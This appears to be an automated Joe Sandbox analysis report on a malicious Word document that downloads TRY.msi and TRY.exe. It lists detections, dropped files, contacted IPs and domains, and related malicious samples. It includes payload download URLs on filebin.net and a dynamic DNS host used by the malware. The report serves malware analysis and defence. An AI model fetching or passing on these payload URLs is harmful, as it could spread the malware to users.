12543_0008858249_FWDOUTSTANDING_20200604.doc	24%	ReversingLabs	Win32.Downloader.Mutisedow
12543_0008858249_FWDOUTSTANDING_20200604.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	100%	Avira	HEUR/AGEN.1213068
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	100%	Joe Sandbox ML
C:\Windows\Installer\MSI1064.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSI1064.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI847A.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSI847A.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIFECD.tmp	0%	Metadefender		Browse
C:\Windows\Installer\MSIFECD.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
filebin.net	5%	Virustotal		Browse
situla.bitbit.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	5%	Virustotal		Browse
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	100%	Avira URL Cloud	malware
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	100%	Avira URL Cloud	malware
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	100%	Avira URL Cloud	malware
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/$	100%	Avira URL Cloud	malware
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/	100%	Avira URL Cloud	malware
https://wus2.contentsync.	0%	URL Reputation	safe
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	100%	Avira URL Cloud	malware
bambam.hopto.org	0%	Avira URL Cloud	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
filebin.net	185.47.40.36	true	true	5%, Virustotal, Browse	unknown
situla.bitbit.net	87.238.33.8	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	true	Avira URL Cloud: malware	unknown
bambam.hopto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.microsoftonline.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://shell.suite.office.com:1443	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://autodiscover-s.outlook.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://roaming.edog.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cdn.entity.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://powerlift.acompli.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cortana.ai	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.aadrm.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.microsoftstream.com/api/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://cr.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://graph.ppe.windows.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	~DF20725BC976A732BA.TMP.3.dr, ~DF3B9CC377E0CCEDD0.TMP.3.dr, inprogressinstallinfo.ipi.3.dr, ~DFFFE9197EB1FCF16E.TMP.3.dr, ~DFAB5AE087B19AB60D.TMP.3.dr, ~DFAC439D90DB59E05A.TMP.3.dr	true	Avira URL Cloud: malware	unknown
https://officeci.azurewebsites.net/api/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://store.office.cn/addinstemplate	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://globaldisco.crm.dynamics.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dev0-api.acompli.net/autodetect	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	~DF20598E5DAB6B2B3C.TMP.3.dr	true	Avira URL Cloud: malware	unknown
https://www.odwebp.svc.ms	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://web.microsoftstream.com/video/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://filebin.net/rf43v6qzghbj7h7b/$	54841c.rbs.3.dr	true	Avira URL Cloud: malware	unknown
https://graph.windows.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dataservice.o365filtering.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://ncus.contentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
http://weather.service.msn.com/data.aspx	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://apis.live.net/v5.0/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://filebin.net/rf43v6qzghbj7h7b/	54841c.rbs.3.dr	true	Avira URL Cloud: malware	unknown
https://management.azure.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://wus2.contentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.office.net	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://incidents.diagnosticssdf.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://entitlement.diagnostics.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://substrate.office.com/search/api/v2/init	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://outlook.office365.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://webshell.suite.office.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://management.azure.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://devnull.onenote.com	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://ncus.pagecontentsync.	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high
https://messaging.office.com/	931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
87.238.33.8	situla.bitbit.net	Norway	39029	REDPILL-LINPRORedpillLinproNO	false
185.47.40.36	filebin.net	Norway	39029	REDPILL-LINPRORedpillLinproNO	true
87.238.33.7	unknown	Norway	39029	REDPILL-LINPRORedpillLinproNO	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	611840
Start date and time: 20/04/202209:26:59	2022-04-20 09:26:59 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.winDOC@26/45@4/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 58.5%) Quality average: 35.5% Quality standard deviation: 35.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 27 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .doc Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.88.38, 52.109.12.22, 52.109.88.40
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
09:28:14	API Interceptor	1x Sleep call for process: msiexec.exe modified
09:28:32	API Interceptor	73x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
87.238.33.8	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	Shahini Ferramenta.doc	Get hash	malicious	Browse
	DHL NOTIFICATION.doc	Get hash	malicious	Browse
	DHL NOTIFICATION.doc	Get hash	malicious	Browse
	oZPv3ngzrx.exe	Get hash	malicious	Browse
185.47.40.36	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	SWIFT pagesa .doc	Get hash	malicious	Browse
	Holdings.doc	Get hash	malicious	Browse
	Holdings.doc	Get hash	malicious	Browse
	Shahini Ferramenta.doc	Get hash	malicious	Browse
	Shahini Ferramenta.doc	Get hash	malicious	Browse
	DHL NOTIFICATION.doc	Get hash	malicious	Browse
	DHL NOTIFICATION.doc	Get hash	malicious	Browse
	oZPv3ngzrx.exe	Get hash	malicious	Browse
	876Vfmj5EI.exe	Get hash	malicious	Browse
	876Vfmj5EI.exe	Get hash	malicious	Browse
	https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrs	Get hash	malicious	Browse
	https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwn	Get hash	malicious	Browse
	PO 91277.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
situla.bitbit.net	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse	87.238.33.8
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.8
	SWIFT pagesa .doc	Get hash	malicious	Browse	87.238.33.8
	SWIFT pagesa .doc	Get hash	malicious	Browse	87.238.33.8
	SWIFT pagesa .doc	Get hash	malicious	Browse	87.238.33.8
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Shahini Ferramenta.doc	Get hash	malicious	Browse	87.238.33.8
	Shahini Ferramenta.doc	Get hash	malicious	Browse	87.238.33.7
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	87.238.33.8
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	87.238.33.8
	oZPv3ngzrx.exe	Get hash	malicious	Browse	87.238.33.7
filebin.net	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	Holdings.doc	Get hash	malicious	Browse	185.47.40.36
	Holdings.doc	Get hash	malicious	Browse	185.47.40.36
	Shahini Ferramenta.doc	Get hash	malicious	Browse	185.47.40.36
	Shahini Ferramenta.doc	Get hash	malicious	Browse	185.47.40.36
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	oZPv3ngzrx.exe	Get hash	malicious	Browse	185.47.40.36
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	Zm1Oz6lCLO.exe	Get hash	malicious	Browse	185.47.40.36
	RYDdv7X9e8.exe	Get hash	malicious	Browse	185.47.40.36
	gPm4nLttxA.exe	Get hash	malicious	Browse	185.47.40.36
	tVzelearRj.exe	Get hash	malicious	Browse	185.47.40.36

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
REDPILL-LINPRORedpillLinproNO	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse	185.47.40.36
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Shahini Ferramenta.doc	Get hash	malicious	Browse	185.47.40.36
	Shahini Ferramenta.doc	Get hash	malicious	Browse	87.238.33.7
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	oZPv3ngzrx.exe	Get hash	malicious	Browse	87.238.33.7
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrs	Get hash	malicious	Browse	185.47.40.36
	https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwn	Get hash	malicious	Browse	185.47.40.36
REDPILL-LINPRORedpillLinproNO	12543_0008858249_FWDOUTSTANDING_20200604.doc	Get hash	malicious	Browse	185.47.40.36
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	87.238.33.7
	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	SWIFT pagesa .doc	Get hash	malicious	Browse	185.47.40.36
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Holdings.doc	Get hash	malicious	Browse	87.238.33.7
	Shahini Ferramenta.doc	Get hash	malicious	Browse	185.47.40.36
	Shahini Ferramenta.doc	Get hash	malicious	Browse	87.238.33.7
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	DHL NOTIFICATION.doc	Get hash	malicious	Browse	185.47.40.36
	oZPv3ngzrx.exe	Get hash	malicious	Browse	87.238.33.7
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	876Vfmj5EI.exe	Get hash	malicious	Browse	185.47.40.36
	https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrs	Get hash	malicious	Browse	185.47.40.36
	https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwn	Get hash	malicious	Browse	185.47.40.36

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bd0bf25947d4a37404f0424edf4db9ad	2543_0008858249_FWDOUTSTANDING_20210420.doc	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://lnkd.in/eN6sPpY2	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://read-shared-0utl00k-c.firebaseapp.com/?email=	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://app.twilead.com/v2/preview/yn7vOTKQAH2FF4b9Mos0?notrack=true	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	PaySlip.htm	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://secure.centrumcom.com/	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	Coanda-Remittance7271.html	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	Image6432.jpg.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://t.co/lZpSJyl9J3	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	PD0532.jpg.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	res3.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	t5UnDIIByu.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://tinyurl.com/y8etbgez	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	Statement851.htm	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	Factura.xlsx.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	1n2MifgYj0.dll	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://office365-onedriveverify.myportfolio.com/	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	https://nrbu.tv/video/qNkmeyWk4w	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	ll.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
	Purchase order......exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.8
54328bd36c14bd82ddaa0c04b25ed9ad	#Uc8fc#Ubb38 30% #Uc794#Uc561 #Ud655#Uc778.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	Detalle de la transacci#U00f3n adjunto.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	319-7359-01 BL DRAFT.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	New Doc.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	S3sktQcYXPChxy5.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	MV ANNA.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
	S08323456789098765432678900.exe	Get hash	malicious	Browse	185.47.40.36 87.238.33.7
